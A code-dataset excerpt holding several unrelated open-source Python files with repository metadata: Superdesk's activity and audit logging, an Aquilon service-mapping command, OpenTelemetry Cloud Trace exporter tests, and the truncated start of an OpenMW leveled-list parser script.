lgpl-2.1
| 4,053 | 0.000247 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import datetime
import logging
from bson.objectid import ObjectId
from flask import g
import superdesk
from superdesk import get_resource_service
from superdesk.emails import send_activity_emails
from superdesk.errors import SuperdeskApiError, add_notifier
from superdesk.notification import push_notification
from superdesk.resource import Resource
from superdesk.services import BaseService
from superdesk.utc import utcnow
log = logging.getLogger(__name__)
def init_app(app):
endpoint_name = 'activity'
service = ActivityService(endpoint_name, backend=superdesk.get_backend())
ActivityResource(endpoint_name, app=app, service=service)
endpoint_name = 'audit'
service = AuditService(endpoint_name, backend=superdesk.get_backend())
AuditResource(endpoint_name, app=app, service=service)
app.on_inserted += service.on_generic_inserted
app.on_updated += service.on_generic_updated
app.on_deleted_item += service.on_generic_deleted
    # Registering with intrinsic privileges because a user should be able to mark their own notifications as read.
superdesk.intrinsic_privilege(resource_name='activity', method=['PATCH'])
class AuditResource(Resource):
endpoint_name = 'audit'
resource_methods = ['GET']
item_methods = ['GET']
schema = {
'resource': {'type': 'string'},
'action': {'type': 'string'},
'extra': {'type': 'dict'},
'user': Resource.rel('users', False)
}
exclude = {endpoint_name, 'activity', 'dictionaries', 'macros'}
class AuditService(BaseService):
def on_generic_inserted(self, resource, docs):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
if not len(docs):
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'created',
'extra': docs[0]
}
self.post([audit])
def on_generic_updated(self, resource, doc, original):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'updated',
'extra': doc
}
self.post([audit])
def on_generic_deleted(self, resource, doc):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'deleted',
'extra': doc
}
self.post([audit])
class ActivityResource(Resource):
endpoint_name = 'activity'
resource_methods = ['GET']
item_methods = ['GET', 'PATCH']
schema = {
'name': {'type': 'string'},
'message': {'type': 'string'},
'data': {'type': 'dict'},
'recipients': {
'type': 'list',
'schema': {
'type': 'dict',
'schema': {
'user_id': Resource.rel('users'),
'read': {'type': 'boolean', 'default': False},
'desk_id': Resource.rel('desks')
}
}
},
'item': Resource.rel('archive', type='string'),
'user': Resource.rel('users'),
'desk': Resource.rel('desks'),
'resource': {'type': 'string'}
}
exclude = {endpoint_name, 'notification'}
datasource = {
'default_sort': [('_created', -1)],
'filter': {'_created': {'$gte': utcnow() - datetime.timedelta(days=1)}}
}
superdesk.register_default_user_preference('email:notification', {
'type': 'bool',
'enabled': True,
'default': True,
'label': 'Send notifications via email',
'category': 'notifications',
})
class ActivityService(BaseService):
def on_update(self, updates, original):
""" Called on the patch request to mark a activity/notification/comment as having been read and
nothing else
:param updates:
:param original:
:return:
"""
user = getattr(g, 'user', None)
if not user:
raise SuperdeskApiError.notFoundError('Can not determine user')
user_id = user.get('_id')
# make sure that the user making the read notification is in the notification list
if not self.is_recipient(updates, user_id):
raise SuperdeskApiError.forbiddenError('User is not in the notification list')
# make sure the transition is from not read to read
if not self.is_read(updates, user_id) and self.is_read(original, user_id):
raise SuperdeskApiError.forbiddenError('Can not set notification as read')
# make sure that no other users are being marked as read
for recipient in updates.get('recipients', []):
if recipient['user_id'] != user_id:
if self.is_read(updates, recipient['user_id']) != self.is_read(original, recipient['user_id']):
raise SuperdeskApiError.forbiddenError('Can not set other users notification as read')
        # make sure that no other fields are being updated, just read and _updated
if len(updates) != 2:
raise SuperdeskApiError.forbiddenError('Can not update')
def is_recipient(self, activity, user_id):
"""
Checks if the given user is in the list of recipients
"""
return any(r for r in activity.get('recipients', []) if r['user_id'] == user_id)
def is_read(self, activity, user_id):
"""
Returns the read value for the given user
"""
return next((r['read'] for r in activity.get('recipients', []) if r['user_id'] == user_id), False)
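    # Illustrative shape (hypothetical id): with
    #   activity = {'recipients': [{'user_id': uid, 'read': True}]}
    # is_recipient(activity, uid) is True and is_read(activity, uid) is True;
    # a user that is not in the recipients list reads as False.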
ACTIVITY_CREATE = 'create'
ACTIVITY_UPDATE = 'update'
ACTIVITY_DELETE = 'delete'
ACTIVITY_EVENT = 'event'
ACTIVITY_ERROR = 'error'
def add_activity(activity_name, msg, resource=None, item=None, notify=None, notify_desks=None,
can_push_notification=True, **data):
"""
    Adds an activity to the activity log.
    This will become part of the current user's activity log.
    If someone is set to be notified, the activity will also land in their notifications box.
:param activity_name: Name of the activity
:type activity_name: str
:param msg: Message to be recorded in the activity log
:type msg: str
:param resource: resource name generating this activity
:type resource: str
:param item: article instance, if the activity is being recorded against an article, default None
:type item: dict
:param notify: user identifiers against whom the activity should be recorded, default None
:type notify: list
:param notify_desks: desk identifiers if someone mentions Desk Name in comments widget, default None
:type notify_desks: list
:param can_push_notification: flag indicating if a notification should be pushed via WebSocket, default True
:type can_push_notification: bool
:param data: kwargs
:type data: dict
:return: activity object
:rtype: dict
"""
activity = {
'name': activity_name,
'message': msg,
'data': data,
'resource': resource
}
name = ActivityResource.endpoint_name
user = getattr(g, 'user', None)
if user:
activity['user'] = user.get('_id')
activity['recipients'] = []
if notify:
activity['recipients'] = [{'user_id': ObjectId(_id), 'read': False} for _id in notify]
name = activity_name
if notify_desks:
activity['recipients'].extend([{'desk_id': ObjectId(_id), 'read': False} for _id in notify_desks])
name = activity_name
if item:
activity['item'] = str(item.get('guid', item.get('_id')))
if item.get('task') and item['task'].get('desk'):
activity['desk'] = ObjectId(item['task']['desk'])
get_resource_service(ActivityResource.endpoint_name).post([activity])
if can_push_notification:
push_notification(name, _dest=activity['recipients'])
return activity
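# Illustrative call (hypothetical values): the message is stored verbatim and
# the extra kwargs end up in activity['data']:
#   add_activity(ACTIVITY_UPDATE, 'item updated', resource='archive',
#                item=item, notify=[str(user_id)])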
def notify_and_add_activity(activity_name, msg, resource=None, item=None, user_list=None, **data):
"""
Adds the activity and notify enabled and active users via email.
"""
add_activity(activity_name, msg=msg, resource=resource, item=item,
notify=[str(user.get("_id")) for user in user_list] if user_list else None, **data)
if activity_name == ACTIVITY_ERROR or user_list:
recipients = get_recipients(user_list, activity_name)
if activity_name != ACTIVITY_ERROR:
current_user = getattr(g, 'user', None)
activity = {
'name': activity_name,
'message': current_user.get('display_name') + ' ' + msg if current_user else msg,
'data': data,
'resource': resource
}
else:
activity = {
'name': activity_name,
'message': 'System ' + msg,
'data': data,
'resource': resource
}
if recipients:
send_activity_emails(activity=activity, recipients=recipients)
def get_recipients(user_list, activity_name):
if not user_list and activity_name == ACTIVITY_ERROR:
user_list = get_resource_service('users').get_users_by_user_type('administrator')
recipients = [user.get('email') for user in user_list if not user.get('needs_activation', True) and
user.get('is_enabled', False) and user.get('is_active', False) and
get_resource_service('preferences')
.email_notification_is_enabled(preferences=user.get('user_preferences', {}))]
return recipients
add_notifier(notify_and_add_activity)
|
akintolga/superdesk-core
|
superdesk/activity.py
|
Python
|
agpl-3.0
| 10,291 | 0.002624 |
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains the logic for `aq map service`."""
from aquilon.worker.broker import BrokerCommand
from aquilon.aqdb.model import (Personality, HostEnvironment, ServiceMap,
ServiceInstance, NetworkEnvironment)
from aquilon.aqdb.model.host_environment import Production
from aquilon.worker.dbwrappers.change_management import (validate_prod_personality,
enforce_justification)
from aquilon.worker.dbwrappers.location import get_location
from aquilon.worker.dbwrappers.network import get_network_byip
class CommandMapService(BrokerCommand):
required_parameters = ["service", "instance"]
def doit(self, session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv):
if not dbmap:
dbmap = ServiceMap(service_instance=dbinstance, location=dblocation,
network=dbnetwork, personality=dbpersona,
host_environment=dbenv)
session.add(dbmap)
def render(self, session, logger, service, instance, archetype, personality,
host_environment, networkip, justification, reason, user,
**kwargs):
dbinstance = ServiceInstance.get_unique(session, service=service,
name=instance, compel=True)
dblocation = get_location(session, **kwargs)
if networkip:
dbnet_env = NetworkEnvironment.get_unique_or_default(session)
dbnetwork = get_network_byip(session, networkip, dbnet_env)
else:
dbnetwork = None
dbpersona = None
dbenv = None
if personality:
dbpersona = Personality.get_unique(session, name=personality,
archetype=archetype, compel=True)
for dbstage in dbpersona.stages.values():
validate_prod_personality(dbstage, user, justification, reason, logger)
elif host_environment:
dbenv = HostEnvironment.get_instance(session, host_environment)
if isinstance(dbenv, Production):
enforce_justification(user, justification, reason, logger)
else:
enforce_justification(user, justification, reason, logger)
q = session.query(ServiceMap)
q = q.filter_by(service_instance=dbinstance,
location=dblocation, network=dbnetwork,
personality=dbpersona,
host_environment=dbenv)
dbmap = q.first()
self.doit(session, dbmap, dbinstance, dblocation, dbnetwork, dbpersona,
dbenv)
session.flush()
return
|
guillaume-philippon/aquilon
|
lib/aquilon/worker/commands/map_service.py
|
Python
|
apache-2.0
| 3,474 | 0.001727 |
# Copyright 2021 The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import unittest
from unittest import mock
import pkg_resources
from google.cloud.trace_v2.types import AttributeValue, BatchWriteSpansRequest
from google.cloud.trace_v2.types import Span as ProtoSpan
from google.cloud.trace_v2.types import TruncatableString
from google.rpc import code_pb2
from google.rpc.status_pb2 import Status
from opentelemetry.exporter.cloud_trace import (
MAX_EVENT_ATTRS,
MAX_LINK_ATTRS,
MAX_NUM_EVENTS,
MAX_NUM_LINKS,
CloudTraceSpanExporter,
_extract_attributes,
_extract_events,
_extract_links,
_extract_resources,
_extract_span_kind,
_extract_status,
_format_attribute_value,
_get_time_from_ns,
_strip_characters,
_truncate_str,
)
from opentelemetry.exporter.cloud_trace.version import __version__
from opentelemetry.sdk.resources import Resource
from opentelemetry.sdk.trace import Event
from opentelemetry.sdk.trace import _Span as Span
from opentelemetry.trace import Link, SpanContext, SpanKind
from opentelemetry.trace.status import Status as SpanStatus
from opentelemetry.trace.status import StatusCode
# pylint: disable=too-many-public-methods
class TestCloudTraceSpanExporter(unittest.TestCase):
def setUp(self):
self.client_patcher = mock.patch(
"opentelemetry.exporter.cloud_trace.TraceServiceClient"
)
self.client_patcher.start()
def tearDown(self):
self.client_patcher.stop()
@classmethod
def setUpClass(cls):
cls.project_id = "PROJECT"
cls.attributes_variety_pack = {
"str_key": "str_value",
"bool_key": False,
"double_key": 1.421,
"int_key": 123,
}
cls.extracted_attributes_variety_pack = ProtoSpan.Attributes(
attribute_map={
"str_key": AttributeValue(
string_value=TruncatableString(
value="str_value", truncated_byte_count=0
)
),
"bool_key": AttributeValue(bool_value=False),
"double_key": AttributeValue(
string_value=TruncatableString(
value="1.4210", truncated_byte_count=0
)
),
"int_key": AttributeValue(int_value=123),
}
)
cls.agent_code = _format_attribute_value(
"opentelemetry-python {}; google-cloud-trace-exporter {}".format(
_strip_characters(
pkg_resources.get_distribution("opentelemetry-sdk").version
),
_strip_characters(__version__),
)
)
cls.example_trace_id = "6e0c63257de34c92bf9efcd03927272e"
cls.example_span_id = "95bb5edabd45950f"
cls.example_time_in_ns = 1589919268850900051
cls.example_time_stamp = _get_time_from_ns(cls.example_time_in_ns)
cls.str_20kb = "a" * 20 * 1024
cls.str_16kb = "a" * 16 * 1024
cls.str_300 = "a" * 300
cls.str_256 = "a" * 256
cls.str_128 = "a" * 128
def test_constructor_default(self):
exporter = CloudTraceSpanExporter(self.project_id)
self.assertEqual(exporter.project_id, self.project_id)
def test_constructor_explicit(self):
client = mock.Mock()
exporter = CloudTraceSpanExporter(self.project_id, client=client)
self.assertIs(exporter.client, client)
self.assertEqual(exporter.project_id, self.project_id)
def test_export(self):
resource_info = Resource(
{
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"gcp.resource_type": "gce_instance",
}
)
span_datas = [
Span(
name="span_name",
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
parent=None,
kind=SpanKind.INTERNAL,
resource=resource_info,
attributes={"attr_key": "attr_value"},
)
]
cloud_trace_spans = {
"name": "projects/{}/traces/{}/spans/{}".format(
self.project_id, self.example_trace_id, self.example_span_id
),
"span_id": self.example_span_id,
"parent_span_id": None,
"display_name": TruncatableString(
value="span_name", truncated_byte_count=0
),
"attributes": ProtoSpan.Attributes(
attribute_map={
"g.co/r/gce_instance/zone": _format_attribute_value("US"),
"g.co/r/gce_instance/instance_id": _format_attribute_value(
"host"
),
"g.co/r/gce_instance/project_id": _format_attribute_value(
"123"
),
"g.co/agent": self.agent_code,
"attr_key": _format_attribute_value("attr_value"),
}
),
"links": None,
"status": None,
"time_events": None,
"start_time": None,
"end_time": None,
# pylint: disable=no-member
"span_kind": ProtoSpan.SpanKind.INTERNAL,
}
client = mock.Mock()
exporter = CloudTraceSpanExporter(self.project_id, client=client)
exporter.export(span_datas)
self.assertTrue(client.batch_write_spans.called)
client.batch_write_spans.assert_called_with(
request=BatchWriteSpansRequest(
name="projects/{}".format(self.project_id),
spans=[cloud_trace_spans],
)
)
def test_extract_status_code_unset(self):
self.assertIsNone(
_extract_status(SpanStatus(status_code=StatusCode.UNSET))
)
def test_extract_status_code_ok(self):
self.assertEqual(
_extract_status(SpanStatus(status_code=StatusCode.OK)),
Status(code=code_pb2.OK),
)
def test_extract_status_code_error(self):
self.assertEqual(
_extract_status(
SpanStatus(
status_code=StatusCode.ERROR,
description="error_desc",
)
),
Status(code=code_pb2.UNKNOWN, message="error_desc"),
)
def test_extract_status_code_future_added(self):
self.assertEqual(
_extract_status(
SpanStatus(
status_code=mock.Mock(),
)
),
Status(code=code_pb2.UNKNOWN),
)
def test_extract_empty_attributes(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4),
ProtoSpan.Attributes(attribute_map={}),
)
def test_extract_variety_of_attributes(self):
self.assertEqual(
_extract_attributes(
self.attributes_variety_pack, num_attrs_limit=4
),
self.extracted_attributes_variety_pack,
)
def test_extract_label_mapping_attributes(self):
attributes_labels_mapping = {
"http.scheme": "http",
"http.host": "172.19.0.4:8000",
"http.method": "POST",
"http.request_content_length": 321,
"http.response_content_length": 123,
"http.route": "/fuzzy/search",
"http.status_code": 200,
"http.url": "http://172.19.0.4:8000/fuzzy/search",
"http.user_agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
}
extracted_attributes_labels_mapping = ProtoSpan.Attributes(
attribute_map={
"/http/client_protocol": AttributeValue(
string_value=TruncatableString(
value="http", truncated_byte_count=0
)
),
"/http/host": AttributeValue(
string_value=TruncatableString(
value="172.19.0.4:8000", truncated_byte_count=0
)
),
"/http/method": AttributeValue(
string_value=TruncatableString(
value="POST", truncated_byte_count=0
)
),
"/http/request/size": AttributeValue(int_value=321),
"/http/response/size": AttributeValue(int_value=123),
"/http/route": AttributeValue(
string_value=TruncatableString(
value="/fuzzy/search", truncated_byte_count=0
)
),
"/http/status_code": AttributeValue(int_value=200),
"/http/url": AttributeValue(
string_value=TruncatableString(
value="http://172.19.0.4:8000/fuzzy/search",
truncated_byte_count=0,
)
),
"/http/user_agent": AttributeValue(
string_value=TruncatableString(
value="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
truncated_byte_count=0,
)
),
}
)
self.assertEqual(
_extract_attributes(attributes_labels_mapping, num_attrs_limit=9),
extracted_attributes_labels_mapping,
)
def test_ignore_invalid_attributes(self):
self.assertEqual(
_extract_attributes(
{"illegal_attribute_value": {}, "legal_attribute": 3},
num_attrs_limit=4,
),
ProtoSpan.Attributes(
attribute_map={"legal_attribute": AttributeValue(int_value=3)},
dropped_attributes_count=1,
),
)
def test_too_many_attributes(self):
too_many_attrs = {}
for attr_key in range(5):
too_many_attrs[str(attr_key)] = 0
proto_attrs = _extract_attributes(too_many_attrs, num_attrs_limit=4)
self.assertEqual(proto_attrs.dropped_attributes_count, 1)
def test_add_agent_attribute(self):
self.assertEqual(
_extract_attributes({}, num_attrs_limit=4, add_agent_attr=True),
ProtoSpan.Attributes(
attribute_map={"g.co/agent": self.agent_code},
dropped_attributes_count=0,
),
)
def test_agent_attribute_priority(self):
# Drop existing attributes in favor of the agent attribute
self.assertEqual(
_extract_attributes(
{"attribute_key": "attr_value"},
num_attrs_limit=1,
add_agent_attr=True,
),
ProtoSpan.Attributes(
attribute_map={"g.co/agent": self.agent_code},
dropped_attributes_count=1,
),
)
def test_attribute_value_truncation(self):
# shouldn't truncate
self.assertEqual(
_format_attribute_value(self.str_300),
AttributeValue(
string_value=TruncatableString(
value=self.str_300,
truncated_byte_count=0,
)
),
)
# huge string should truncate
self.assertEqual(
_format_attribute_value(self.str_20kb),
AttributeValue(
string_value=TruncatableString(
value=self.str_16kb,
truncated_byte_count=(20 - 16) * 1024,
)
),
)
def test_list_attribute_value(self):
self.assertEqual(
_format_attribute_value(("one", "two")),
AttributeValue(
string_value=TruncatableString(
value="one,two", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value([True]),
AttributeValue(
string_value=TruncatableString(
value="True", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value((2, 5)),
AttributeValue(
string_value=TruncatableString(
value="2,5", truncated_byte_count=0
)
),
)
self.assertEqual(
_format_attribute_value([2.0, 0.5, 4.55]),
AttributeValue(
string_value=TruncatableString(
value="2.0,0.5,4.55", truncated_byte_count=0
)
),
)
def test_attribute_key_truncation(self):
self.assertEqual(
_extract_attributes(
{self.str_300: "attr_value"}, num_attrs_limit=4
),
ProtoSpan.Attributes(
attribute_map={
self.str_128: AttributeValue(
string_value=TruncatableString(
value="attr_value", truncated_byte_count=0
)
)
}
),
)
def test_extract_empty_events(self):
self.assertIsNone(_extract_events([]))
def test_too_many_events(self):
event = Event(
name="event", timestamp=self.example_time_in_ns, attributes={}
)
too_many_events = [event] * (MAX_NUM_EVENTS + 5)
self.assertEqual(
_extract_events(too_many_events),
ProtoSpan.TimeEvents(
time_event=[
{
"time": self.example_time_stamp,
"annotation": {
"description": TruncatableString(
value="event",
),
"attributes": {},
},
},
]
* MAX_NUM_EVENTS,
dropped_annotations_count=len(too_many_events)
- MAX_NUM_EVENTS,
),
)
def test_too_many_event_attributes(self):
event_attrs = {}
for attr_key in range(MAX_EVENT_ATTRS + 5):
event_attrs[str(attr_key)] = 0
proto_events = _extract_events(
[
Event(
name="a",
attributes=event_attrs,
timestamp=self.example_time_in_ns,
)
]
)
self.assertEqual(
len(
proto_events.time_event[0].annotation.attributes.attribute_map
),
MAX_EVENT_ATTRS,
)
self.assertEqual(
proto_events.time_event[
0
].annotation.attributes.dropped_attributes_count,
len(event_attrs) - MAX_EVENT_ATTRS,
)
def test_extract_multiple_events(self):
event1 = Event(
name="event1",
attributes=self.attributes_variety_pack,
timestamp=self.example_time_in_ns,
)
event2_nanos = 1589919438550020326
event2 = Event(
name="event2",
attributes={"illegal_attr_value": dict()},
timestamp=event2_nanos,
)
self.assertEqual(
_extract_events([event1, event2]),
ProtoSpan.TimeEvents(
time_event=[
{
"time": self.example_time_stamp,
"annotation": {
"description": TruncatableString(
value="event1", truncated_byte_count=0
),
"attributes": self.extracted_attributes_variety_pack,
},
},
{
"time": _get_time_from_ns(event2_nanos),
"annotation": {
"description": TruncatableString(
value="event2", truncated_byte_count=0
),
"attributes": ProtoSpan.Attributes(
attribute_map={}, dropped_attributes_count=1
),
},
},
]
),
)
def test_event_name_truncation(self):
event1 = Event(
name=self.str_300, attributes={}, timestamp=self.example_time_in_ns
)
self.assertEqual(
_extract_events([event1]),
ProtoSpan.TimeEvents(
time_event=[
{
"time": self.example_time_stamp,
"annotation": {
"description": TruncatableString(
value=self.str_256,
truncated_byte_count=300 - 256,
),
"attributes": {},
},
},
]
),
)
def test_extract_empty_links(self):
self.assertIsNone(_extract_links([]))
def test_extract_multiple_links(self):
span_id1 = "95bb5edabd45950f"
span_id2 = "b6b86ad2915c9ddc"
link1 = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(span_id1, 16),
is_remote=False,
),
attributes={},
)
link2 = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(span_id1, 16),
is_remote=False,
),
attributes=self.attributes_variety_pack,
)
link3 = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(span_id2, 16),
is_remote=False,
),
attributes={"illegal_attr_value": dict(), "int_attr_value": 123},
)
self.assertEqual(
_extract_links([link1, link2, link3]),
ProtoSpan.Links(
link=[
{
"trace_id": self.example_trace_id,
"span_id": span_id1,
"type": "TYPE_UNSPECIFIED",
"attributes": ProtoSpan.Attributes(attribute_map={}),
},
{
"trace_id": self.example_trace_id,
"span_id": span_id1,
"type": "TYPE_UNSPECIFIED",
"attributes": self.extracted_attributes_variety_pack,
},
{
"trace_id": self.example_trace_id,
"span_id": span_id2,
"type": "TYPE_UNSPECIFIED",
"attributes": {
"attribute_map": {
"int_attr_value": AttributeValue(int_value=123)
},
},
},
]
),
)
def test_extract_link_with_none_attribute(self):
link = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
attributes=None,
)
self.assertEqual(
_extract_links([link]),
ProtoSpan.Links(
link=[
{
"trace_id": self.example_trace_id,
"span_id": self.example_span_id,
"type": "TYPE_UNSPECIFIED",
"attributes": ProtoSpan.Attributes(attribute_map={}),
},
]
),
)
def test_too_many_links(self):
link = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
attributes={},
)
too_many_links = [link] * (MAX_NUM_LINKS + 5)
self.assertEqual(
_extract_links(too_many_links),
ProtoSpan.Links(
link=[
{
"trace_id": self.example_trace_id,
"span_id": self.example_span_id,
"type": "TYPE_UNSPECIFIED",
"attributes": {},
}
]
* MAX_NUM_LINKS,
dropped_links_count=len(too_many_links) - MAX_NUM_LINKS,
),
)
def test_too_many_link_attributes(self):
link_attrs = {}
for attr_key in range(MAX_LINK_ATTRS + 1):
link_attrs[str(attr_key)] = 0
attr_link = Link(
context=SpanContext(
trace_id=int(self.example_trace_id, 16),
span_id=int(self.example_span_id, 16),
is_remote=False,
),
attributes=link_attrs,
)
proto_link = _extract_links([attr_link])
self.assertEqual(
len(proto_link.link[0].attributes.attribute_map), MAX_LINK_ATTRS
)
def test_extract_empty_resources(self):
self.assertEqual(_extract_resources(Resource.get_empty()), {})
def test_extract_resource_attributes_with_regex(self):
resource_regex = re.compile(r"service\..*")
resource = Resource(
attributes={
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"extra_info": "extra",
"gcp.resource_type": "gce_instance",
"not_gcp_resource": "value",
"service.name": "my-app",
"service.version": "1",
}
)
expected_extract = {
"g.co/r/gce_instance/project_id": "123",
"g.co/r/gce_instance/instance_id": "host",
"g.co/r/gce_instance/zone": "US",
"service.name": "my-app",
"service.version": "1",
}
self.assertEqual(
_extract_resources(resource, resource_regex), expected_extract
)
def test_non_matching_regex(self):
resource_regex = re.compile(r"this-regex-matches-nothing")
resource = Resource(
attributes={
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"extra_info": "extra",
"gcp.resource_type": "gce_instance",
"not_gcp_resource": "value",
}
)
expected_extract = {
"g.co/r/gce_instance/project_id": "123",
"g.co/r/gce_instance/instance_id": "host",
"g.co/r/gce_instance/zone": "US",
}
self.assertEqual(
_extract_resources(resource, resource_regex), expected_extract
)
def test_extract_well_formed_resources(self):
resource = Resource(
attributes={
"cloud.account.id": 123,
"host.id": "host",
"cloud.zone": "US",
"cloud.provider": "gcp",
"extra_info": "extra",
"gcp.resource_type": "gce_instance",
"not_gcp_resource": "value",
}
)
expected_extract = {
"g.co/r/gce_instance/project_id": "123",
"g.co/r/gce_instance/instance_id": "host",
"g.co/r/gce_instance/zone": "US",
}
self.assertEqual(_extract_resources(resource), expected_extract)
def test_extract_malformed_resources(self):
# This resource doesn't have all the fields required for a gce_instance
        # Specifically, it's missing "host.id", "cloud.zone", "cloud.account.id"
resource = Resource(
attributes={
"gcp.resource_type": "gce_instance",
"cloud.provider": "gcp",
}
)
# Should throw when passed a malformed GCP resource dict
self.assertRaises(KeyError, _extract_resources, resource)
def test_extract_unsupported_gcp_resources(self):
# Unsupported gcp resources will be ignored
resource = Resource(
attributes={
"cloud.account.id": "123",
"host.id": "host",
"extra_info": "extra",
"not_gcp_resource": "value",
"gcp.resource_type": "unsupported_gcp_resource",
"cloud.provider": "gcp",
}
)
self.assertEqual(_extract_resources(resource), {})
def test_extract_unsupported_provider_resources(self):
# Resources with currently unsupported providers will be ignored
resource = Resource(
attributes={
"cloud.account.id": "123",
"host.id": "host",
"extra_info": "extra",
"not_gcp_resource": "value",
"cloud.provider": "aws",
}
)
self.assertEqual(_extract_resources(resource), {})
def test_truncate_string(self):
"""Cloud Trace API imposes limits on the length of many things,
e.g. strings, number of events, number of attributes. We truncate
these things before sending it to the API as an optimization.
"""
self.assertEqual(_truncate_str("aaaa", limit=1), ("a", 3))
self.assertEqual(_truncate_str("aaaa", limit=5), ("aaaa", 0))
self.assertEqual(_truncate_str("aaaa", limit=4), ("aaaa", 0))
self.assertEqual(_truncate_str("中文翻译", limit=4), ("中", 9))
def test_strip_characters(self):
self.assertEqual("0.10.0", _strip_characters("0.10.0b"))
self.assertEqual("1.20.5", _strip_characters("1.20.5"))
self.assertEqual("3.1.0", _strip_characters("3.1.0beta"))
self.assertEqual("4.2.0", _strip_characters("4b.2rc.0a"))
self.assertEqual("6.20.15", _strip_characters("b6.20.15"))
# pylint: disable=no-member
def test_extract_span_kind(self):
self.assertEqual(
_extract_span_kind(SpanKind.INTERNAL), ProtoSpan.SpanKind.INTERNAL
)
self.assertEqual(
_extract_span_kind(SpanKind.CLIENT), ProtoSpan.SpanKind.CLIENT
)
self.assertEqual(
_extract_span_kind(SpanKind.SERVER), ProtoSpan.SpanKind.SERVER
)
self.assertEqual(
_extract_span_kind(SpanKind.CONSUMER), ProtoSpan.SpanKind.CONSUMER
)
self.assertEqual(
_extract_span_kind(SpanKind.PRODUCER), ProtoSpan.SpanKind.PRODUCER
)
self.assertEqual(
_extract_span_kind(-1), ProtoSpan.SpanKind.SPAN_KIND_UNSPECIFIED
)
|
GoogleCloudPlatform/opentelemetry-operations-python
|
opentelemetry-exporter-gcp-trace/tests/test_cloud_trace_exporter.py
|
Python
|
apache-2.0
| 28,235 | 0.000106 |
#!/usr/bin/env python3
from struct import pack, unpack
from datetime import date
from pathlib import Path
import os.path
import argparse
import sys
import re
configFilename = 'openmw.cfg'
configPaths = { 'linux': '~/.config/openmw',
'freebsd': '~/.config/openmw',
'darwin': '~/Library/Preferences/openmw' }
modPaths = { 'linux': '~/.local/share/openmw/data',
'freebsd': '~/.local/share/openmw/data',
'darwin': '~/Library/Application Support/openmw/data' }
def packLong(i):
# little-endian, "standard" 4-bytes (old 32-bit systems)
return pack('<l', i)
def packString(s):
return bytes(s, 'ascii')
def packPaddedString(s, l):
bs = bytes(s, 'ascii')
if len(bs) > l:
# still need to null-terminate
return bs[:(l-1)] + bytes(1)
else:
return bs + bytes(l - len(bs))
def parseString(ba):
i = ba.find(0)
return ba[:i].decode(encoding='ascii', errors='ignore')
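# e.g. parseString(b'sword\x00\x00') -> 'sword' (reads up to the first NUL)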
def parseNum(ba):
return int.from_bytes(ba, 'little')
def parseFloat(ba):
return unpack('f', ba)[0]
def parseLEV(rec):
levrec = {}
sr = rec['subrecords']
levrec['type'] = rec['type']
levrec['name'] = parseString(sr[0]['data'])
levrec['calcfrom'] = parseNum(sr[1]['data'])
levrec['chancenone'] = parseNum(sr[2]['data'])
levrec['file'] = os.path.basename(rec['fullpath'])
# Apparently, you can have LEV records that end before
# the INDX subrecord. Found those in Tamriel_Data.esm
if len(sr) > 3:
listcount = parseNum(sr[3]['data'])
listitems = []
for i in range(0,listcount*2,2):
itemid = parseString(sr[4+i]['data'])
itemlvl = parseNum(sr[5+i]['data'])
listitems.append((itemlvl, itemid))
levrec['items'] = listitems
else:
levrec['items'] = []
return levrec
def parseTES3(rec):
tesrec = {}
sr = rec['subrecords']
tesrec['version'] = parseFloat(sr[0]['data'][0:4])
tesrec['filetype'] = parseNum(sr[0]['data'][4:8])
tesrec['author'] = parseString(sr[0]['data'][8:40])
tesrec['desc'] = parseString(sr[0]['data'][40:296])
tesrec['numrecords'] = parseNum(sr[0]['data'][296:300])
masters = []
for i in range(1, len(sr), 2):
mastfile = parseString(sr[i]['data'])
